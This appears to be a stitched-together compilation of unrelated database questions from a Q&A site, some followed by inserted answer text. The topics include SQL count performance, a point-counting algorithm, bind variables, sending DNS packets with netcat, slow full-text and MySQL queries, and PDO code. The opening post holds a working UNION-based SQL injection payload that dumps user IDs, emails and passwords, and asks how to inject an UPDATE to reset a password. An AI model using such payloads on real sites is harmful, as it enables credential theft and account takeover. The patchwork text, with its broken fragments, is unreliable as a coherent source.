SQL Injection update query

I have a SQL injection and I can dump data from the DB with the query below:

func=REC&lastid=7491&start=3&uid=56+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,concat(uid,':',email,':',password) FROM user WHERE uid=56; --&token=6eadee0862e6fe05d588cb29c416d9

How can I add an UPDATE query to change the password? I’ve tried the query below but it didn’t work:

func=REC&lastid=7491&start=3&uid=56+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,UPDATE users SET password='xxxxxxx'; --&token=6eadee0862e6fe05d588cb29c416d9 

Is there a better way of displaying ‘Count’ of records beside other columns in a select query?

I have a table with the below structure:

Test1(c_num  number ,c_first_name varchar2(50), c_last_name varchar2(50)) 

1) There is a normal index on the c_num column.

2) The table has nearly 5 million records.

I have a procedure, which you can see below, and I want to display Count(*) along with the other columns. I want to know if there is a better way of doing this so that we get better performance.

create or replace procedure get_members(o_result out sys_refcursor) is
begin
  open o_result for
    select c_num,
           c_first_name,
           c_last_name,
           (select count(*) from test1) members_cnt -- Is there a better way instead of doing this?
      from test1;
end;

Thanks in advance
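One common alternative is the analytic form `count(*) over ()`, which attaches the total to every row in the same scan instead of using a scalar subquery (an uncorrelated scalar subquery should only be evaluated once by Oracle anyway, so measure both). A minimal sketch of the rewritten cursor query, with SQLite standing in for Oracle (window functions need SQLite 3.25+):

```python
import sqlite3

# Tiny stand-in for the Oracle table.
con = sqlite3.connect(":memory:")
con.execute("create table test1 (c_num integer, c_first_name text, c_last_name text)")
con.executemany("insert into test1 values (?, ?, ?)",
                [(1, "a", "x"), (2, "b", "y"), (3, "c", "z")])

# count(*) over () computes the total row count alongside the other
# columns in one pass, replacing (select count(*) from test1).
rows = con.execute("""
    select c_num, c_first_name, c_last_name,
           count(*) over () as members_cnt
      from test1
""").fetchall()
print(rows)  # every row carries members_cnt = 3
```

The same `count(*) over ()` expression is valid in Oracle and drops straight into the `open o_result for` query above.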

Fast query on the number of elements in a quarter plane

I have a scatter of 2D elements on a 2D plane.

I would like an efficient algorithm to prepare and query the number of points in a quarter plane (inclusive of boundary).

The quarter plane is defined by a point $(x,y)$. All elements $(x', y')$ where $x' \le x$ and $y' \le y$ are in the quarter plane.

For example

  • I have elements [(1,1), (2,2), (1,2), (3,2)],
  • My queries are [(1,1), (2,2), (3,3)]

The program should return [1,3,4].

This is for a past competitive programming challenge (WiFi Network problem in this competition)
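The standard approach for this kind of offline dominance counting is to sort both the points and the queries by x, sweep, and maintain a Fenwick tree over compressed y coordinates. A sketch (function and variable names are my own), which reproduces the example above:

```python
from bisect import bisect_right

def quarter_plane_counts(points, queries):
    """For each query (x, y), count points (px, py) with px <= x and py <= y.
    O((n + q) log n) via an x-sweep plus a Fenwick tree over compressed y."""
    ys = sorted({py for _, py in points})      # y-coordinate compression
    tree = [0] * (len(ys) + 1)                 # 1-based Fenwick tree

    def add(i):                                # insert a point's y-rank
        while i <= len(ys):
            tree[i] += 1
            i += i & -i

    def prefix(i):                             # how many inserted ys have rank <= i
        s = 0
        while i > 0:
            s += tree[i]
            i -= i & -i
        return s

    pts = sorted(points)                       # sweep points in x order
    order = sorted(range(len(queries)), key=lambda k: queries[k][0])
    res = [0] * len(queries)
    j = 0
    for k in order:
        qx, qy = queries[k]
        while j < len(pts) and pts[j][0] <= qx:
            add(bisect_right(ys, pts[j][1]))   # 1-based rank of the point's y
            j += 1
        res[k] = prefix(bisect_right(ys, qy))  # points seen so far with y <= qy
    return res

print(quarter_plane_counts([(1, 1), (2, 2), (1, 2), (3, 2)],
                           [(1, 1), (2, 2), (3, 3)]))  # [1, 3, 4]
```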

Is there a query language variant of Turing Completeness?

By this I mean a theory where you can say "language X is query complete", so that you know that language is able to express any sort of query. I’m guessing not, because some queries would run into things that a language would have to be Turing complete to handle?

Why do I wonder? Well, you might have a relational database and a graph database, and someone might say that anything that can be done in the relational database can be done in the graph database (albeit at different speeds). So I would like it if there were some terminology like "DB A and DB B are both query complete", or, failing that, a way to categorize levels of "query completeness" (I’m just going to assume my ill-defined concept is totally understandable to everyone), so one can say things like "DB A is at query level 4 but DB B is at query level 3, although of course B is much faster because of those limitations."

I sure hope (so as to not feel like a bigger idiot than normal) that the answer to this question isn’t just a flat No.

How to use bind variables in a dynamic query when the exact number of variables is not known

I have a procedure in which I’m using dynamic SQL. The input parameter i_tables is a string which is a concatenation of the names of some tables. It might be one of these:

1) All tables: test_table1,test_table2,test_table3.

2) Only two tables, for instance test_table2,test_table3.

3) Nothing, so NULL will be passed to the procedure.

I’ve read about bind variables and the significant role they have in preventing injection and improving performance. I want to use bind variables in my procedure, but there is one thing I don’t know how to handle:

As you can see, we do not know the exact number of variables. It might be one, two, three, or none, depending on the input parameter i_tables.

create or replace procedure bind_variable_test(i_tables varchar2,
                                               i_cid    number,
                                               o_result out sys_refcursor) is
  actual_query varchar2(1000) := '';
begin
  -- this is the base query
  actual_query := 'select *
                     from z_test_a t1
                    inner join z_test_b t2
                       on t1.id = t2.id';

  -- check input parameter "i_tables"
  if i_tables like '%test_table1%' then
    actual_query := actual_query || ' inner join test_table1 t3
                       on t3.id = t1.id and t3.cid = ' || i_cid;
  end if;

  if i_tables like '%test_table2%' then
    actual_query := actual_query || ' inner join test_table2 t4
                       on t4.id = t1.id and t4.cid = ' || i_cid;
  end if;

  if i_tables like '%test_table3%' then
    actual_query := actual_query || ' inner join test_table3 t5
                       on t5.id = t1.id and t5.cid = ' || i_cid;
  end if;

  open o_result for actual_query;
end;
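The usual pattern for a variable number of binds is to grow the SQL text and a parallel parameter list together, then bind everything at once (in PL/SQL, `OPEN ... FOR ... USING` needs a fixed bind count, while the DBMS_SQL package allows a variable number of BIND_VARIABLE calls). A language-agnostic sketch of the collect-the-binds pattern, shown in Python with `?` placeholders; only the placeholder values are bound, and the table names come from a fixed whitelist, never from the input string:

```python
def build_query(i_tables, i_cid):
    """Build the dynamic join and a matching parameter list.
    Table names are taken from a hard-coded whitelist (t3/t4/t5 aliases
    mirror the procedure above); i_cid is always bound, never concatenated."""
    sql = ("select t1.* from z_test_a t1 "
           "inner join z_test_b t2 on t1.id = t2.id")
    params = []
    for alias, tab in (("t3", "test_table1"),
                       ("t4", "test_table2"),
                       ("t5", "test_table3")):
        if i_tables and tab in i_tables:
            sql += (f" inner join {tab} {alias}"
                    f" on {alias}.id = t1.id and {alias}.cid = ?")
            params.append(i_cid)    # one bind value per placeholder
    return sql, params

sql, params = build_query("test_table2,test_table3", 42)
print(sql)
print(params)  # [42, 42] -- one value per ? placeholder
```

The same shape in PL/SQL would append `:cid1`, `:cid2`, ... to the query text and issue one `DBMS_SQL.BIND_VARIABLE` call per appended placeholder.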

Create DNS query with Netcat or /dev/udp/ [closed]

I’m trying to send a valid DNS request with either nc or bash and /dev/udp/.

I captured a valid DNS packet to use as a template:

tcpdump -XX port 53 

Then, in a new terminal, I made a request with curl:

curl https://duckduckgo.com/ 

This generates the following data in the tcpdump terminal.

    0x0000:  4500 003c b0b4 4000 4011 73c3 0a00 020f  E..<..@.@.s.....
    0x0010:  0a2a 0001 bdd4 0035 0028 4f24 cfc9 0100  .*.....5.(O$....
    0x0020:  0001 0000 0000 0000 0a64 7563 6b64 7563  .........duckduc
    0x0030:  6b67 6f03 636f 6d00 0001 0001            kgo.com.....

From this, I modified the request slightly to match this reference and saved it to a file /tmp/ddg.txt.

0000:  4500 003c b0b4 4000 4011 73c3 0a00 020f  E..<..@.@.s.....
0010:  0a2a 0001 bdd4 0035 0028 4f24 cfc9 0100  .*.....5.(O$....
0020:  0001 0000 0000 0000 0a64 7563 6b64 7563  .........duckduc
0030:  6b67 6f03 636f 6d00 0001 0001            kgo.com.....

Then I tried generating a request, but I got the following error message:

xxd -r /tmp/ddg.txt | nc -q 1 -nu 10.42.0.1 53
xxd: sorry, cannot seek backwards.

In Wireshark, the request appears malformed. What am I getting wrong here? Is it possible to send a proper DNS query with this method?
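Two things stand out in the setup above: xxd -r expects its own hexdump layout (one offset per line), and, more importantly, the template still contains the 20-byte IP header and 8-byte UDP header that tcpdump -XX prints. nc builds those headers itself, so the data you feed it must start at the DNS message (the cfc9 0100 bytes). A sketch that writes just the 32-byte DNS payload with octal escapes (the resolver address 10.42.0.1 is taken from the question):

```shell
# DNS message only -- strip the IP/UDP headers shown by tcpdump -XX;
# nc adds its own when sending over UDP.
# Bytes: id=0xcfc9, flags=0x0100 (recursion desired), QDCOUNT=1,
# then QNAME "duckduckgo.com", QTYPE=A (1), QCLASS=IN (1).
printf '\317\311\001\000\000\001\000\000\000\000\000\000\012duckduckgo\003com\000\000\001\000\001' > /tmp/ddg.bin
wc -c < /tmp/ddg.bin    # 32: just the DNS message, no IP/UDP headers
# Send it (uncomment on a machine where 10.42.0.1 is the resolver):
# nc -q 1 -u 10.42.0.1 53 < /tmp/ddg.bin
```

With the headers stripped, Wireshark should decode the outgoing packet as a standard A query rather than a malformed one.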


How can I increase the performance of my FTS query?

I’m pretty new to database world and I have the following table:

                        Table "public.so_rum"
  Column   |          Type           | Collation | Nullable | Default
-----------+-------------------------+-----------+----------+---------
 id        | integer                 |           |          |
 title     | character varying(1000) |           |          |
 posts     | text                    |           |          |
 body      | tsvector                |           |          |
 parent_id | integer                 |           |          |
Indexes:
    "so_rum_body_idx" rum (body)

I have loaded around 27M records, and I want to perform full text search on my posts. body is a tsvector of posts, and it has a RUM index.

However, when I run an FTS query, it takes a long time. For example:

EXPLAIN ANALYZE select count(*) from so_rum
  where body @@ plainto_tsquery('english','not fast enough data is slow much')

gives back:

                                                                QUERY PLAN
--------------------------------------------------------------------------------------------------------------------------------------------
 Aggregate  (cost=188.01..188.02 rows=1 width=8) (actual time=42207.386..42207.387 rows=1 loops=1)
   ->  Index Scan using so_rum_body_idx on so_rum  (cost=180.00..188.01 rows=1 width=0) (actual time=34716.047..42206.555 rows=497 loops=1)
         Index Cond: (body @@ '''fast'' & ''enough'' & ''data'' & ''slow'' & ''much'''::tsquery)
 Planning Time: 0.247 ms
 Execution Time: 42208.211 ms
(5 rows)

Another similar query, but fetching posts this time:

EXPLAIN ANALYZE select posts from so_rum
  where body @@ plainto_tsquery('english',' why java type casting is throwing the exception? How to solve it');

                                                             QUERY PLAN
---------------------------------------------------------------------------------------------------------------------------------------
 Index Scan using so_rum_body_idx on so_rum  (cost=216.00..224.01 rows=1 width=614) (actual time=45155.186..45516.358 rows=31 loops=1)
   Index Cond: (body @@ '''java'' & ''type'' & ''cast'' & ''throw'' & ''except'' & ''solv'''::tsquery)
 Planning Time: 19.540 ms
 Execution Time: 45517.985 ms
(4 rows)

How can I reduce the query time here? What mistake am I making?

MySQL query is very slow (15 minutes)

I was previously using SQLite for a personal project, and due to a constraint of having it available online, I decided to switch to MySQL. I converted my database to the MySQL equivalent, but I just noticed that performance is VERY poor. This is a 70 MB database with around 600k records in total. The query I am running is an INNER JOIN that executes in less than 500 ms using SQLite, but the same query using MySQL takes 15 minutes.

SELECT has.tag_id, has.image_id
FROM has
INNER JOIN image ON image.image_id = has.image_id
INNER JOIN person ON person.person_id = image.person_id
WHERE person.name = "Random Person"
  • has table has 80k records
  • image table has 290k records
  • person table has 500 records

Here is the structure of the three tables:

create table media.person (
    person_id int auto_increment primary key,
    name      text not null
) collate = utf8_unicode_ci;

create table media.image (
    id        int auto_increment,
    image_id  int  not null,
    person_id int  not null,
    link      text not null,
    checksum  text null,
    constraint id unique (id)
) collate = utf8_unicode_ci;

alter table media.image add primary key (id);

create table media.has (
    id       int auto_increment primary key,
    tag_id   int not null,
    image_id int not null
) collate = utf8_unicode_ci;

Note that I added a primary key to the has table because I suspected it might have been the source of the problem, but it isn’t, and SQLite was doing fine without that primary key.

The database uses the InnoDB engine. Here is the output of the mysql --version command:

mysql Ver 14.14 Distrib 5.7.30 

Where could the problem come from? I can understand a small loss of performance, because MySQL is heavier than SQLite, but certainly not to the point of going from 500 ms to 15 minutes for such a simple query.
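One likely culprit, going by the schema above: none of the join or filter columns (image.image_id, image.person_id, has.image_id, person.name) has an index, so each of the 80k has rows triggers full scans in the nested-loop join. A hedged sketch of the missing indexes (index names are my own; name is TEXT, so MySQL requires a key prefix length):

```sql
ALTER TABLE media.image  ADD INDEX idx_image_image_id  (image_id);
ALTER TABLE media.image  ADD INDEX idx_image_person_id (person_id);
ALTER TABLE media.has    ADD INDEX idx_has_image_id    (image_id);
-- TEXT columns need a prefix length in an index; 191 chars is a
-- common choice that stays within InnoDB key-size limits.
ALTER TABLE media.person ADD INDEX idx_person_name     (name(191));
```

After adding these, EXPLAIN on the query should show ref lookups on each join instead of full table scans. (SQLite was likely fast because its implicit rowid plus smaller working set masked the missing indexes.)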

How to change this query from PDO to MySQLi?

I am trying to get the user’s information and show it in the user’s profile. I found this query, but it is in PDO and my work is in MySQLi. Here is the query:

if (isset($_SESSION['user'])) {
    $getuser = $con->prepare("SELECT * FROM users WHERE username = ?");
    $getuser->execute(array($sessionuser));
    $info = $getuser->fetch();
}

And here the whole code

<?php
if (isset($_SESSION['user'])) {
    $getuser = $con->prepare("SELECT * FROM users WHERE username = ?");
    $getuser->execute(array($sessionuser));
    $info = $getuser->fetch();
}
?>
Username: Email: Register Date: Password:

Create dynamic sql query to select all related data in DB based on entry table and ID

Hope all is well. I am hoping you can help me.

Problem statement: I’m tasked with creating a dynamic SQL statement which will select all related data from a given table where the identifier is passed. For each table where relevant data is found, I would like the data to be exported onto a separate tab within Excel.

If I were doing this manually, I would perform the following queries and export the data onto each tab:

Select * from Mason where id = 12345
Select * from MasonContacts where Companyid = 12345
Select * from MasonOpportunities where Comid = 12345

However, given the sheer volume of tables, this isn’t viable.

Step 1: Type in my identifier (in this case a field called "Id" in the table "Mason"). The query will always start from this table.

Table Name : Mason Field : Id = "12345"

Step 2: Search against the table "MasonContacts", on the field "Companyid". Return all columns & records where Companyid = 12345.

Table Name : MasonContacts Field : Companyid

Step 3: Search against the table "MasonOpportunities", on the field "Comid". Return all columns & records where Comid = 12345.

Table Name : MasonOpportunities Field : Comid

Looking forward to your help
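Assuming SQL Server (the catalog views below are SQL Server specific; other RDBMSs have equivalents in information_schema), one way to avoid hand-writing a query per table is to generate the SELECTs from the metadata. A sketch, with the identifier column names hard-coded from the three examples above; splitting the result sets onto Excel tabs would then be handled by the export tool (e.g. one worksheet per result set in SSIS or PowerShell):

```sql
-- Generate one SELECT per table that carries one of the known
-- identifier columns, then run them all with the ID bound once.
DECLARE @id int = 12345, @sql nvarchar(max) = N'';

SELECT @sql = @sql
    + N'SELECT * FROM ' + QUOTENAME(t.name)
    + N' WHERE ' + QUOTENAME(c.name) + N' = @id;' + CHAR(10)
FROM sys.tables t
JOIN sys.columns c ON c.object_id = t.object_id
WHERE c.name IN (N'Id', N'Companyid', N'Comid');

EXEC sp_executesql @sql, N'@id int', @id = @id;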